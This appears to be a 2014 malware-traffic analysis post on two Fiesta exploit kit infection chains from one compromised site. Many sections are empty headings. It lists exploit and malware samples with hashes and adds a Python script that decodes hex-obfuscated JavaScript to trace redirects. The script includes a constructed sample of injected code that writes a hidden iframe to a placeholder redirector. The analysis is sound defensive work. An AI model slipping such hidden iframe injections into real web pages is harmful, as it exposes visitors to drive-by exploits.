2014-09-18 - TWO DIFFERENT FIESTA EK INFECTIONS TRIGGERED BY THE SAME COMPROMISED WEBSITE

ASSOCIATED FILES:

NOTES:

 

CHAIN OF EVENTS

ASSOCIATED DOMAINS:

 

PAGE FROM COMPROMISED WEBSITE:

 

REGULAR FIESTA INFECTION PATH:

REGULAR FIESTA:

 

NEW FIESTA INFECTION PATH:

NEW FIESTA:

 

POST-INFECTION TRAFFIC:

CLICK FRAUD TRAFFIC BEGINS:

 

PRELIMINARY MALWARE ANALYSIS

FIRST FLASH FILE (FROM THE "NEW FIESTA" TRAFFIC):

File name:  2014-09-18-Fiesta-EK-first-flash-file.swf
File size:  2.2 KB ( 2273 bytes )
MD5 hash:  17ed0f7fd3e648411e021eab6ef78cf9
Detection ratio:  1 / 55
First submission:  2014-09-18 14:48:43 UTC
VirusTotal link:  https://www.virustotal.com/en/file/72e498e7ed60a4384b2d613bff7ac9454505f4471fcccd4e8006ac71ed9e40d1/analysis/

 

FIRST SILVERLIGHT FILE (FROM THE "NEW FIESTA" TRAFFIC):

File name:  2014-09-18-Fiesta-EK-first-silverlight-file.xap
File size:  3.7 KB ( 3750 bytes )
MD5 hash:  c1d01850216cd0d9b02065f27de7f0a8
Detection ratio:  0 / 53
First submission:  2014-09-18 14:46:41 UTC
VirusTotal link:  https://www.virustotal.com/en/file/f488f82eac46e71c73178253a9a97825a168a44a8255e8d87057d580c2fca745/analysis/

 

FLASH EXPLOIT:

File name:  2014-09-18-Fiesta-EK-flash-exploit.swf
File size:  10.0 KB ( 10209 bytes )
MD5 hash:  36912f3f0398594a8ae1b2962c21e528
Detection ratio:  3 / 55
First submission:  2014-09-18 15:45:11 UTC
VirusTotal link:  https://www.virustotal.com/en/file/1de4e29cb0f3fc115c70a4082919a2e47760d52ab0a10536dbf1b2c995feb3a6/analysis/

 

JAVA EXPLOIT:

File name:  2014-09-18-Fiesta-EK-java-exploit.jar
File size:  5.1 KB ( 5220 bytes )
MD5 hash:  5d4a1572061b2c09b46f99e9ad7a62b2
Detection ratio:  3 / 55
First submission:  2014-09-18 14:47:30 UTC
VirusTotal link:  https://www.virustotal.com/en/file/9f559797bc19451242603cd81ad3a29010ad890a43fadd79839e344bfcc7a54c/analysis/

 

PDF EXPLOIT:

File name:  2014-09-18-Fiesta-EK-pdf-exploit.pdf
File size:  7.3 KB ( 7451 bytes )
MD5 hash:  d1ba9ac63d9c80b725f939a5f99c4727
Detection ratio:  4 / 54
First submission:  2014-09-18 14:47:45 UTC
VirusTotal link:  https://www.virustotal.com/en/file/a56f22010aee681d4aa77795b86955df761ea65637809178d356eaf3aa3a7738/analysis/

 

SILVERLIGHT EXPLOIT:

File name:  2014-09-18-Fiesta-EK-silverlight-exploit.xap
File size:  18.8 KB ( 19284 bytes )
MD5 hash:  8c9e47e6f7802b65428b31c8f28bc899
Detection ratio:  2 / 54
First submission:  2014-09-17 18:42:07 UTC
VirusTotal link:  https://www.virustotal.com/en/file/897e5a20b6b3dd925d1ea5b6fdc657bfa3dff3582050aee0dae7b295c3042d59/analysis/

 

RERDOM MALWARE FROM THE COMPROMISED VM:

File name:  UpdateFlashPlayer_92ad4ca3.exe
File size:  164.0 KB ( 167936 bytes )
MD5 hash:  5ac521e0e93c3bee7b99ada635e6a0de
Detection ratio:  8 / 54
First submission:  2014-09-18 14:48:15 UTC
VirusTotal link:  https://www.virustotal.com/en/file/14c735ebfc4a42f2172e1195111f2ccedf47cd2a2368322e3455b600179da886/analysis/

 

SNORT EVENTS

Emerging Threats and ETPRO rulesets from Sguil on Security Onion (not including ET INFO or ET POLICY rules):

Sourcefire VRT ruleset from Snort 2.9.6.2 on Debian 7 (not including preprocessor events):

 

PATH TO THE REGULAR FIESTA EK

In the file demo.js from the compromised website, there is some hex-obfuscated script at the end of the file.  Decoding that hexadecimal gives the next URL in the infection chain:

 

This HTTP GET request returns an iframe pointing to the landing page for regular Fiesta:

 

The first HTTP GET request for ad traffic from the compromised site returns a response with some script injected at the beginning.  That injected script points to the next URL in the infection chain:

 

HTML returned from this HTTP GET request starts the "new Fiesta" traffic from hxrgy.ianlar.in:

 
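Worked example, added here and not part of the original write-up or the author's tooling: a small Python script that performs the two recovery steps described above for the regular Fiesta path.  It decodes a run of \xHH / \uHHHH JavaScript escapes (the kind of hex-obfuscated tail found at the end of demo.js) to recover the embedded URL, then pulls the iframe src out of the HTML returned by that URL.  The script and HTML it operates on are constructed stand-ins using example.invalid placeholders, not the real demo.js or the real redirect response, and every function name is this example's own.

```python
"""Recover the next hop from hex-obfuscated JavaScript and a redirect page.

Added example for this write-up, not the tooling used by the original author.
SAMPLE_JS and SAMPLE_RESPONSE_HTML are constructed placeholders (example.invalid),
not the content actually served by the compromised site.
"""
import re

# A single JavaScript escape: \xHH (group 1) or \uHHHH (group 2).
_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")

# A run of at least four consecutive escapes: the obfuscated blob itself.
_BLOB_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}){4,}")

_URL_RE = re.compile(r"https?://[^\s'\"<>]+")
_IFRAME_SRC_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)",
                            re.IGNORECASE)


def decode_js_escapes(blob: str) -> str:
    """Turn a string of \\xHH / \\uHHHH escapes into the text it encodes."""
    def repl(m: re.Match) -> str:
        return chr(int(m.group(1) or m.group(2), 16))
    return _ESCAPE_RE.sub(repl, blob)


def find_obfuscated_blobs(js_source: str) -> list:
    """Return every run of escape sequences in the script, already decoded."""
    return [decode_js_escapes(m.group(0)) for m in _BLOB_RE.finditer(js_source)]


def extract_urls(text: str) -> list:
    """Pull every http(s) URL out of a piece of decoded text."""
    return _URL_RE.findall(text)


def next_hops_from_js(js_source: str) -> list:
    """Decode the obfuscated parts of a script and return the URLs they hide."""
    urls = []
    for blob in find_obfuscated_blobs(js_source):
        urls.extend(extract_urls(blob))
    return urls


def extract_iframe_srcs(html: str) -> list:
    """Return the src of every iframe in an HTML response (the landing page hop)."""
    return _IFRAME_SRC_RE.findall(html)


# Constructed stand-in for the tail of demo.js: the URL is stored entirely as
# \xHH escapes and only assembled at runtime.  Decodes to
# http://redir.example.invalid/in.php (placeholder host, not the real one).
SAMPLE_JS = (
    "function demo(){ /* legitimate site script */ }\n"
    "var u = \""
    r"\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x64\x69\x72\x2e\x65\x78\x61\x6d\x70\x6c\x65"
    r"\x2e\x69\x6e\x76\x61\x6c\x69\x64\x2f\x69\x6e\x2e\x70\x68\x70"
    "\";\n"
    "document.write('<iframe src=\"' + u + '\" width=1 height=1></iframe>');\n"
)

# Constructed stand-in for the response to that redirector request: a hidden
# iframe pointing at the exploit kit landing page (placeholder host).
SAMPLE_RESPONSE_HTML = (
    "<html><body>\n"
    '<iframe src="http://landing.example.invalid/landing/" width="1" height="1"'
    ' frameborder="0"></iframe>\n'
    "</body></html>"
)


def trace_chain(js_source: str, response_html: str) -> dict:
    """Combine both steps: decoded redirector URL(s), then landing page URL(s)."""
    return {
        "redirector": next_hops_from_js(js_source),
        "landing": extract_iframe_srcs(response_html),
    }


if __name__ == "__main__":
    for hop, urls in trace_chain(SAMPLE_JS, SAMPLE_RESPONSE_HTML).items():
        for url in urls:
            print(f"{hop}: {url}")
```

In practice you would run next_hops_from_js over the saved demo.js from the pcap and extract_iframe_srcs over the body of the response to the URL it reveals; the regexes deliberately accept both \xHH and \uHHHH forms since kits switch between them.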

FINAL NOTES

Once again, here are the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.
